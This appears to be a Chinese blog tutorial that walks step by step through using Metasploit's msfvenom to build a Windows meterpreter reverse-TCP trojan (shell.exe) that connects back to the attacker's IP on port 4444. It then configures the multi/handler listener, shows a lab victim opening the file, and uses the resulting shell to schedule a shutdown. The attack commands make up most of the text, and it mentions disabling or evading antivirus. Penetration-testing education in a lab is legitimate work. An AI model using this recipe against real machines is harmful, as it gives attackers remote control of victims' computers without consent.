大家好,我是许心痕,今天给大家带来的是metasploit渗透测试中的:离线应用层攻击。离线攻击就是用msf生成一个木马让别人去点开木马获取别人电脑的shell,获得shell之后就获得了目标主机的控制权,最简单的就是给人家关机啦(千万不要做坏事哦)!!
好了,开始吧
0x00 准备环境
1、一台装有kali linux系统的主机(或虚拟机)、一台目标主机(这里我使用windows系统)
2、使用ifconfig命令查看本机IP,我的是192.168.64.129
0x01 开始渗透
第一步:先打开终端,输入msfconsole按回车,打开msf环境。
输入msfconsole按回车
第二步:生成木马
这里使用的命令是:msfvenom,让我们看看参数有哪些(百度搜索到的参数)
-p, –payload 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用& #039;-& #039;或者stdin指定
-l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, –nopsled 为payload预先指定一个NOP滑动长度
-f, –format 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)
-e, –encoder [encoder] 指定需要使用的encoder(编码器)
-a, –arch 指定payload的目标架构
–platform 指定payload的目标平台
-s, –space 设定有效攻击荷载的最大长度
-b, –bad-chars 设定规避字符集,比如: & #039;\x00\xff& #039;
-i, –iterations 指定payload的编码次数
-c, –add-code 指定一个附加的win32 shellcode文件
-x, –template 指定一个自定义的可执行文件作为模板
-k, –keep 保护模板程序的动作,注入的payload作为一个新的进程运行
–payload-options 列举payload的标准选项
-o, –out 保存payload
-v, –var-name 指定一个自定义的变量,以确定输出格式
–shellest 最小化生成payload
-h, –help 查看帮助选项
–help-formats 查看msf支持的输出格式列表
好了,现在开始使用参数生成一个木马(以对方的系统是windows系统为例。其他系统请百度):
输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.64.129 LPORT=4444 -f exe > shell.exe (lhost后面跟的是本机ip地址,lport后面跟的是监听端口,一般是4444端口,-f exe指定输出格式exe,生成以shell命名的可执行文件)按回车后就生成了一个木马,可以指定生成路径,默认的路径是home文件夹。生成木马后别急着打开,要先使用msf配置一些东西,看下一步
生成shell为名字的可执行文件exe
第三步:输入use exploit/multi/handler按回车调用模块
进入模块
第四步:输入set PAYLOAD windows/meterpreter/reverse_tcp 设置载荷
设置载荷
第五步:输入show options 查看选项
查看选项
第六步:输入set LHOST 192.168.64.129 按回车设置主机为本机ip。lhost后面跟本机的ip
设置主机
第七步:输入set LPORT 4444 按回车,设置监听端口为4444端口。
设置监听端口为4444
第八步:输入exploit进行攻击,然后就大功告成!!
expolit攻击
0x02 模拟受害者,点击木马
1、以我的物理机(windows 10 系统)为例子,我先把虚拟机生成的木马拖动到物理机上,并进行点击木马操作(注意,虚拟机的kali终端不要关闭,一直保持exploit攻击状态)。
点击木马之后就获得了对方的shell
2、上图中,点击木马之后显示这些信息,就说明我们已经拿到了shell。接下来,我们输入shell按回车。
我们已经进入到物理机的命令提示符
3、看到没有,这个图是不是有点熟悉?哈哈,我们已经进入到windows的cmd命令提示符了,学过电脑的都知道,接下来,嘿嘿,我们使用cmd命令让对方的电脑关机,输入shutdown -s -t 3600按回车,这里我设置为3600秒,因为我还要用物理机写这篇文章,你们可以设置为0秒,瞬间关机。
让对方电脑在60分钟后关机
4、好了,就写到这里了,我们先把物理机取消关机状态。输入shutdown -a
取消关机
注意事项:因为生成的木马会被360等杀毒软件检测到并拦截(测试前请关闭杀毒软件),所以还需要进行免杀操作,这里我就不演示了。这就是msf中的离线应用层攻击。想进一步了解的话大家可以去百度哦!
领取专属 10元无门槛券
私享最新 技术干货